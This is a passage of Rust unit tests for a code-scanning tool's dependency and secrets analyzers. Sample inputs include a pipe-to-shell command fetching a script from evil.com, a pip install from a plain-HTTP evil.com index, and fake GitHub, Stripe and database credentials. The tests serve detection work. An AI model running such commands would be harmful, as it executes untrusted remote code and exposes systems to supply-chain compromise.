        let blocks = vec![make_block("sh", "curl https://evil.com/setup.sh | bash")];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.iter().any(|f| f.title.contains("Pipe-to-shell")));
    }

    // A plain-HTTP `--index-url` is reported as an insecure package index.
    #[tokio::test]
    async fn test_dep_detects_insecure_index() {
        let analyzer = DependencyAnalyzer::new();
        let blocks = vec![make_block(
            "sh",
            "pip install --index-url http://evil.com/simple package",
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings
            .iter()
            .any(|f| f.title.contains("Insecure package index")));
    }

    // An ordinary install command with no version pin yields no findings.
    #[tokio::test]
    async fn test_dep_clean() {
        let analyzer = DependencyAnalyzer::new();
        let blocks = vec![make_block("sh", "pip install requests")];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.is_empty());
    }

    // ── SecretsAnalyzer tests ──

    // A `ghp_` token is detected and its evidence is redacted.
    #[tokio::test]
    async fn test_secrets_detects_github_token() {
        let analyzer = SecretsAnalyzer::new();
        let blocks = vec![make_block(
            "py",
            "token = \"ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef1234\"",
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.iter().any(|f| f.title.contains("GitHub")));
        // Verify the token is redacted in evidence
        assert!(findings[0].evidence.contains("***"));
    }

    // An `sk_live_` key is reported as a Stripe secret key.
    #[tokio::test]
    async fn test_secrets_detects_stripe_key() {
        let analyzer = SecretsAnalyzer::new();
        // Build the test key dynamically to avoid triggering GitHub push protection
        let key = format!("sk_live_{}", "5".repeat(24));
        let code = format!("const key = \"{key}\"");
        let blocks = vec![make_block("js", &code)];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.iter().any(|f| f.title.contains("Stripe")));
    }

    // A PostgreSQL URL with `user:password@` is reported as a connection string.
    #[tokio::test]
    async fn test_secrets_detects_db_connection() {
        let analyzer = SecretsAnalyzer::new();
        let blocks = vec![make_block(
            "py",
            "db = \"postgresql://admin:password123@prod.db.com:5432/main\"",
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings
            .iter()
            .any(|f| f.title.contains("Database connection")));
    }

    // Reading a key from the environment is not a finding.
    #[tokio::test]
    async fn test_secrets_clean() {
        let analyzer = SecretsAnalyzer::new();
        let blocks = vec![make_block("py", "x = os.environ['API_KEY']")];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.is_empty());
    }

    // Long input keeps the first 8 and last 4 characters; short input keeps
    // only the first 4.
    #[test]
    fn test_redact_secret() {
        assert_eq!(
            redact_secret("ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZab"),
            "ghp_ABCD***YZab"
        );
        assert_eq!(redact_secret("short"), "shor***");
    }
}